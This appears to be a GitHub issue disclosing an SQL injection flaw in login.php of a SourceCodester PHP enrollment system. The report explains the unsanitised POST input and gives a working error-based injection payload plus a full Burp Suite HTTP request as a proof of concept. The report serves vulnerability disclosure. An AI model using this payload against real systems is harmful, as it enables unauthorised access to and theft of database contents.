You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
The PHP method in the fourth line of the \Final\login.php file retrieves user input from the POST element. Then, the value of this element will be passed to the code without proper purification or validation, and ultimately used for database queries in the PHP method on line 21 of the \Final\login.php file. This may lead to SQL injection attacks.
Impact
Attackers can exploit this vulnerability to gain database privileges, which can result in a large amount of data in the database. If the other party's database has DBA privileges, it may lead to server host privileges being obtained.
DESCRIPTION
Deng Shengke has discovered a serious issue in "CASAP Automated Enrollment System using PHP/MySQLi with Source Code" that can allow attackers to obtain large amounts of database content through SQL injection attacks.
Vulnerability details and POC
Payload
username=admin' OR ROW(5655,9136)>(SELECT COUNT(*),CONCAT(0x0a,(SELECT MID((IFNULL(CAST(schema_name AS NCHAR),0x20)),1,54) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 18,1),0x0a,FLOOR(RAND(0)*2))x FROM (SELECT 7436 UNION SELECT 7676 UNION SELECT 1226 UNION SELECT 4614)a GROUP BY x)-- Opra&password=password
Burp Suite (POC)
POST /login.php HTTP/1.1
Host: www.final.com:10001
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 302
Origin: http://www.final.com:10001
Connection: close
Referer: http://www.final.com:10001/index.php
username=admin' OR ROW(5655,9136)>(SELECT COUNT(*),CONCAT(0x0a,(SELECT MID((IFNULL(CAST(schema_name AS NCHAR),0x20)),1,54) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 18,1),0x0a,FLOOR(RAND(0)*2))x FROM (SELECT 7436 UNION SELECT 7676 UNION SELECT 1226 UNION SELECT 4614)a GROUP BY x)-- Opra&password=password
Here is the MySQL database name obtained from the sqlmap attack
The text was updated successfully, but these errors were encountered:
SourceCodester CASAP Automated Enrollment System using PHP/MySQLi with Source Code login.php SQL injection
NAME OF AFFECTED PRODUCT(S)
Vendor Homepage
AFFECTED AND/OR FIXED VERSION(S)
submitter
Vulnerable File
VERSION(S)
Software Link
PROBLEM TYPE
Vulnerability Type
Root Cause
Impact
DESCRIPTION
Vulnerability details and POC
Payload
Burp Suite (POC)
The text was updated successfully, but these errors were encountered: